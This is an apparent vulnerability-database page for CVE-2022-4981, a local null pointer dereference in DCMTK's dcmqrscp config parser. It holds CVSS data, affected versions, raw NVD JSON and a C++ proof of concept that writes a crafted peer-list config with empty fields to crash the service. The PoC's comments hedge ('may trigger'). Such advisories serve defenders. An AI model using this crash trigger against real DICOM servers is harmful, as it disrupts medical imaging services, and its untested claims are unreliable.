Security Vulnerability Report
CVE-2022-4981 CVSS 3.3 LOW

CVE-2022-4981

Published: 2025-10-21 15:15:38
Last Modified: 2026-04-29 01:00:02

Description

A null pointer dereference vulnerability was found in DCMTK up to 3.6.7. The affected element is the function DcmQueryRetrieveConfig::readPeerList in the file /dcmqrcnf.cc of the component dcmqrscp. The attack requires local access. An exploit is public and may be used. Upgrading to version 3.6.8 resolves this issue; the patch is identified as 957fb31e5. Upgrading the affected component is advised.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:offis:dcmtk:*:*:*:*:*:*:*:* - VULNERABLE
DCMTK < 3.6.8
DCMTK 3.6.7
DCMTK 3.6.6 and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
cpp
// CVE-2022-4981 - DCMTK dcmqrscp Null Pointer Dereference PoC
// This PoC demonstrates triggering a null pointer dereference in
// DcmQueryRetrieveConfig::readPeerList function (/dcmqrcnf.cc)
//
// Prerequisites:
// - DCMTK <= 3.6.7 installed
// - Local access with low privileges
// - Ability to modify or supply a malicious configuration file

#include "dcmtk/dcmqr/dcmqrcnf.h"
#include "dcmtk/dcmdata/dcfilefo.h"
#include <iostream>
#include <fstream>

int main(int argc, char* argv[]) {
    // Step 1: Create a malicious peer list configuration file
    // The configuration file is crafted to trigger null pointer dereference
    // in DcmQueryRetrieveConfig::readPeerList()
    const char* malicious_config =
        "PeerList BEGIN\n"
        " MyPeer\n"
        " AETitle TEST_AE\n"
        " HostName 127.0.0.1\n"
        " Port 11112\n"
        " MyPeer2\n"
        " AETitle \n"   // Empty AETitle may trigger null pointer path
        " HostName \n"  // Empty HostName may trigger null pointer path
        " Port 0\n"
        "PeerList END\n";

    // Step 2: Write the malicious configuration to a temp file
    const char* config_path = "/tmp/malicious_dcmqrscp.cfg";
    std::ofstream config_file(config_path);
    if (!config_file.is_open()) {
        std::cerr << "[-] Failed to create config file" << std::endl;
        return 1;
    }
    config_file << malicious_config;
    config_file.close();
    std::cout << "[*] Malicious config written to: " << config_path << std::endl;

    // Step 3: Initialize DcmQueryRetrieveConfig and trigger readPeerList
    DcmQueryRetrieveConfig config;

    // Step 4: Call readPeerList with the malicious configuration
    // This will trigger the null pointer dereference vulnerability
    OFCondition result = config.readPeerList(config_path);
    if (result.bad()) {
        std::cout << "[*] readPeerList returned error (may indicate crash path)" << std::endl;
    }

    // Step 5: Alternatively, use dcmqrscp command-line tool directly
    // Command: dcmqrscp -c /tmp/malicious_dcmqrscp.cfg
    // This will trigger the null pointer dereference when parsing peer entries
    return 0;
}

// Alternative trigger via command line:
// 1. Create config file with malformed peer entries
// 2. Run: dcmqrscp --config /tmp/malicious_dcmqrscp.cfg
// 3. Observe segfault/null pointer dereference crash

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-4981", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:37.550", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in DCMTK up to 3.6.7. The impacted element is the function DcmQueryRetrieveConfig::readPeerList of the file /dcmqrcnf.cc of the component dcmqrscp. The manipulation results in null pointer dereference. The attack needs to be approached locally. The exploit is now public and may be used. Upgrading to version 3.6.8 is sufficient to resolve this issue. The patch is identified as 957fb31e5. Upgrading the affected component is advised."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:offis:dcmtk:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.8", "matchCriteriaId": "5740DABF-EF27-4531-B285-3F700AB959CC"}]}]}], "references": [{"url": "https://shimo.im/docs/e1Azd4dDQXUgOGqW/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://support.dcmtk.org/redmine/issues/1026", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.329029", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329029", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673134", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://shimo.im/docs/e1Azd4dDQXUgOGqW/read", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}